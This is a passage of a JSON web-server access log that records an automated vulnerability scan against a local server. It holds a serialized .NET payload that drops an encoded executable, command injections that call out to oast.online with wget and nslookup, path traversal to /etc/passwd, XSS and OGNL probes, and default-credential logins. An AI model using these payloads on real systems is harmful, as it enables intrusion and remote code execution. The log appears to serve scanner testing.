ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/downmix.inc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-file?basedir=4&filepath=..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"&uid=10; wget http://c9v8hs0smpv8c6ag07h037ux33qgexni8.oast.online","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"&act=sync&task_number=1;wget http://c9v8hs0smpv8c6ag07h03rtyr6156bs8e.oast.online","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debug_toolbar/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/script?command=|%20nslookup%20c9v8hs0smpv8c6ag07h0nm369diyy9xzd.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 